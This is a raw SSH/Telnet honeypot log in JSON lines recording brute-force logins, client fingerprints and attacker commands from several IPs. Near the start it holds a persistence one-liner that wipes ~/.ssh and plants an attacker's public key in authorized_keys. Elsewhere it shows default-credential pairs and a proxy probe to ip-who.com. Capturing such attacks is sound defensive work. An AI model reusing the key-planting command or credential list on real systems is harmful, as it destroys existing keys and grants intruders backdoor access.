{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T18:03:39.968322Z","src_ip":"199.195.253.95","session":"37b02e55ca52"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T18:03:40.203791Z","src_ip":"199.195.253.95","session":"37b02e55ca52"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:03:40.204719Z","src_ip":"199.195.253.95","session":"37b02e55ca52"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":59054,"dst_ip":"1.2.3.4","dst_port":22,"session":"90d8f56c9e3d","protocol":"ssh","message":"New connection: 199.195.253.95:59054 (1.2.3.4:22) [session: 90d8f56c9e3d]","sensor":"my-vps","timestamp":"2025-08-28T18:03:40.391005Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:03:40.397777Z","src_ip":"199.195.253.95","session":"90d8f56c9e3d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:03:40.632031Z","src_ip":"199.195.253.95","session":"90d8f56c9e3d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T18:03:41.425940Z","src_ip":"199.195.253.95","session":"90d8f56c9e3d"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:03:42.563941Z","src_ip":"199.195.253.95","session":"90d8f56c9e3d"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":59916,"dst_ip":"1.2.3.4","dst_port":22,"session":"15bc8e20246f","protocol":"ssh","message":"New connection: 199.195.253.95:59916 (1.2.3.4:22) [session: 15bc8e20246f]","sensor":"my-vps","timestamp":"2025-08-28T18:03:42.702173Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:03:42.709940Z","src_ip":"199.195.253.95","session":"15bc8e20246f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:03:42.827275Z","src_ip":"199.195.253.95","session":"15bc8e20246f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:03:43.205778Z","src_ip":"199.195.253.95","session":"15bc8e20246f"}
{"eventid":"cowrie.session.closed","duration":"5.5","message":"Connection lost after 5.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:03:43.296029Z","src_ip":"199.195.253.95","session":"37b02e55ca52"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:03:43.296896Z","src_ip":"199.195.253.95","session":"15bc8e20246f"}
{"eventid":"cowrie.session.connect","src_ip":"186.225.142.90","src_port":19170,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b93b23e543b","protocol":"ssh","message":"New connection: 186.225.142.90:19170 (1.2.3.4:22) [session: 0b93b23e543b]","sensor":"my-vps","timestamp":"2025-08-28T18:03:59.676597Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T18:03:59.681176Z","src_ip":"186.225.142.90","session":"0b93b23e543b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T18:03:59.867598Z","src_ip":"186.225.142.90","session":"0b93b23e543b"}
{"eventid":"cowrie.login.success","username":"root","password":"102030","message":"login attempt [root/102030] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:04:00.646965Z","src_ip":"186.225.142.90","session":"0b93b23e543b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T18:04:01.049233Z","src_ip":"186.225.142.90","session":"0b93b23e543b"}
{"eventid":"cowrie.command.input","input":"mount | head -5","message":"CMD: mount | head -5","sensor":"my-vps","timestamp":"2025-08-28T18:04:01.049928Z","src_ip":"186.225.142.90","session":"0b93b23e543b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","size":28,"shasum":"eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:04:01.242375Z","src_ip":"186.225.142.90","session":"0b93b23e543b"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:04:01.244091Z","src_ip":"186.225.142.90","session":"0b93b23e543b"}
{"eventid":"cowrie.session.closed","duration":"118.8","message":"Connection lost after 118.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:04:28.551903Z","src_ip":"212.227.125.160","session":"d16f35778b7b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40972,"dst_ip":"1.2.3.4","dst_port":22,"session":"80a08cc684ef","protocol":"ssh","message":"New connection: 212.227.125.160:40972 (1.2.3.4:22) [session: 80a08cc684ef]","sensor":"my-vps","timestamp":"2025-08-28T18:04:33.539901Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T18:04:33.540652Z","src_ip":"212.227.125.160","session":"80a08cc684ef"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T18:04:33.781738Z","src_ip":"212.227.125.160","session":"80a08cc684ef"}
{"eventid":"cowrie.login.success","username":"root","password":"abcd1234","message":"login attempt [root/abcd1234] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:04:37.710364Z","src_ip":"212.227.125.160","session":"80a08cc684ef"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-28T18:04:37.997445Z","session":"80a08cc684ef"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":54890,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ebe0e9f6525","protocol":"ssh","message":"New connection: 199.195.253.95:54890 (1.2.3.4:22) [session: 8ebe0e9f6525]","sensor":"my-vps","timestamp":"2025-08-28T18:04:46.033552Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:04:46.040890Z","src_ip":"199.195.253.95","session":"8ebe0e9f6525"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:04:46.204464Z","src_ip":"199.195.253.95","session":"8ebe0e9f6525"}
{"eventid":"cowrie.login.failed","username":"admin","password":"qwe","message":"login attempt [admin/qwe] failed","sensor":"my-vps","timestamp":"2025-08-28T18:04:46.878899Z","src_ip":"199.195.253.95","session":"8ebe0e9f6525"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T18:04:47.551859Z","src_ip":"212.227.125.160","session":"80a08cc684ef"}
{"eventid":"cowrie.session.closed","duration":"14.2","message":"Connection lost after 14.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:04:47.786003Z","src_ip":"212.227.125.160","session":"80a08cc684ef"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:04:48.068251Z","src_ip":"199.195.253.95","session":"8ebe0e9f6525"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41702,"dst_ip":"1.2.3.4","dst_port":23,"session":"ccf92e9346e4","protocol":"telnet","message":"New connection: 212.227.125.160:41702 (1.2.3.4:23) [session: ccf92e9346e4]","sensor":"my-vps","timestamp":"2025-08-28T18:04:52.198251Z"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.220","src_port":54736,"dst_ip":"1.2.3.4","dst_port":22,"session":"5fe12f01d5d1","protocol":"ssh","message":"New connection: 171.243.150.220:54736 (1.2.3.4:22) [session: 5fe12f01d5d1]","sensor":"my-vps","timestamp":"2025-08-28T18:05:00.984239Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T18:05:01.007140Z","src_ip":"171.243.150.220","session":"5fe12f01d5d1"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T18:05:02.464062Z","src_ip":"171.243.150.220","session":"5fe12f01d5d1"}
{"eventid":"cowrie.login.failed","username":"sync","password":"click1","message":"login attempt [sync/click1] failed","sensor":"my-vps","timestamp":"2025-08-28T18:05:03.742566Z","src_ip":"171.243.150.220","session":"5fe12f01d5d1"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:05:04.948743Z","src_ip":"171.243.150.220","session":"5fe12f01d5d1"}
{"eventid":"cowrie.session.closed","duration":30.91956901550293,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:05:23.117735Z","src_ip":"212.227.125.160","session":"ccf92e9346e4"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":51862,"dst_ip":"1.2.3.4","dst_port":22,"session":"510ad61dd0da","protocol":"ssh","message":"New connection: 199.195.253.95:51862 (1.2.3.4:22) [session: 510ad61dd0da]","sensor":"my-vps","timestamp":"2025-08-28T18:05:53.186541Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:05:53.194350Z","src_ip":"199.195.253.95","session":"510ad61dd0da"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:05:53.337461Z","src_ip":"199.195.253.95","session":"510ad61dd0da"}
{"eventid":"cowrie.login.failed","username":"robot","password":"robot","message":"login attempt [robot/robot] failed","sensor":"my-vps","timestamp":"2025-08-28T18:05:53.934739Z","src_ip":"199.195.253.95","session":"510ad61dd0da"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:05:55.176583Z","src_ip":"199.195.253.95","session":"510ad61dd0da"}
